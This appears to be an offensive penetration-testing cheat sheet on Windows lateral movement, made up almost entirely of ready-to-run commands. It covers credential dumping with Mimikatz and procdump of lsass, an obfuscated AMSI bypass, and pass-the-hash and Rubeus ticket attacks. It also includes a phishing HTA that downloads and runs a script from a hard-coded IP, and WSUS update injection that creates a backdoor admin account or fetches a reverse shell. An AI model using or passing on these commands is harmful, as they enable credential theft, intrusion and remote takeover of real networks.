Lateral Movement

PSRemoting

PSRemoting Session

New-PSSession -ComputerName Target1
Enter-PSSession -ComputerName Target1
​
# Set trusted hosts to psremote to IP rather than hostname
winrm set winrm/config/client ‘@{TrustedHosts="*"}’
​
# Connect with local admin creds
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}
​
# If you are over C2 and cant get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

PSRemoting Invoke-Command

# Execute Commands or script blocks:
Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
​
# Execute scripts from files:
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
​
# Execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
​
# Pass arguments:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) ArgumentList
​
# Function call within script is used:
Invoke-Command –Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
​
# Execute stateful commands:
$Sess = New-PSSession –Computername Server1
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}

Stateful Mimikatz

$sess = new-pssession -computername server1
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )}
Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -session $sess

Invoke-Mimikatz

# Dump Creds on local machine
Invoke-Mimikatz -DumpCreds
​
# Dump creds on multiple machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
​
# "Over pass the hash" generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'

Double Hop Problem

PowerShell

$cred = Get-Credential DOMAIN\USER
​
# Execute commands
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}
​
# Copy files
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}
​
# Dump
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}
​
# Copy dump back
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}
​
can use rubeus over double hop to extrat ticket then interact with 3rd system:
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}

PsExec / Rubeus

# psexec to first host
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd
​
# Use rubeus on first host to overpass the hash and then access second host.
# NOTE: using the /domain flag makes it unreliable.
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Phish

# Generate HTA
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
​
# Send Email
Send-MailMessage -From 'User01 <user01@fabrikam.com>' -To 'User02 <user02@fabrikam.com>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF
​
# use Nishang to generate powershell phish payloads

Pass-The-Hash

runas /noprofile /netonly /user:<domain\username> powershell.exe
​
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt
​
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'

PsExec

​

​

WSUS

Enumeration

# If you compromise a wsus server you can own a lot
​
# See which comps connecting for updates (port 8530 = http, port 8531 = https)
netstat -ano

Abuse

https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1
​
# Load psexec into directory and WSUSpendu
​
# Send out malicious update to gain local admin on machine
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net
​
# Compromise isolated networks with a reverse shell
# Where Script is an amsi bypass plus a reverse shell connecting over 8531
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>
​
# Listen on host and wait
powercat -l -v -p 8531